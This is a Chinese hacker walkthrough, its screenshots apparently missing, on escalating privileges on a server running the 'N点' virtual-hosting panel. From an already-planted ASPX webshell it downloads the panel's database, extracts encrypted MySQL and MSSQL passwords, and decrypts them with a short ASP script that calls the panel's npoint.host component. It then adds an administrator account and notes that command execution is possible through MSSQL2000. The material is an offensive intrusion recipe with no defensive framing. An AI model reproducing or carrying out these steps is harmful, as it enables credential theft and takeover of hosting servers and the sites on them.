N点虚拟主机提权过程

N点的目录名：NpointSofe，也可在注册表中翻翻。看到支持aspx就成功了一大半：



找到安装目录，直接到目录下去下载数据库文件，也可web中用%23代替#下载：







找到hostcs这个表，直接找到MYSQL和MSSQL密码，这里还是加密的，下面开始解密：







这里还有一个管理员密码，不过据说是无法破解的，反正对我们来说也没多大用处：







直接上我们的解密脚本，asp下提示没权限，以为确实没有权限：







用ASPX的马儿直接编辑，写入加密代码（google可查）：



<!--#includefile=&quot;inc/conn.asp&quot;-->

<!--#includefile=&quot;inc/siteinfo.asp&quot;-->

<!--#includefile=&quot;inc/char.asp&quot;-->

<%

setiishost=server.CreateObject(&quot;npoint.host&quot;)

x=iishost.Eduserpassword(&quot;NLFPK@OJCOCLA@E@FEKJMFADLALKLF@JHOIMAHO@LCDBAAMEOEKGKM@A&quot;,0)

response.writex

%>







访问我们的加密文件，直接得到明文密码：







后来的事情就简单了，直接用aspx马儿带哦数据库管理工具加管理员：







到我们熟悉的界面了，哈哈！







习惯性的总结下：



1.网上还有一个说法是利用admin/sitehost.asp这个文件漏洞提权，但是前提是你要有管理员密码，



感觉这个不太现实，除非管理员傻X到用admin这个密码



2.最关键的一点是web根目录我们必须要有写权限，要么解密就泡汤了



3.在补充下，由于目标是MSSQL2000，所以无需回复xpcmdshell，可直接执行命令
*
*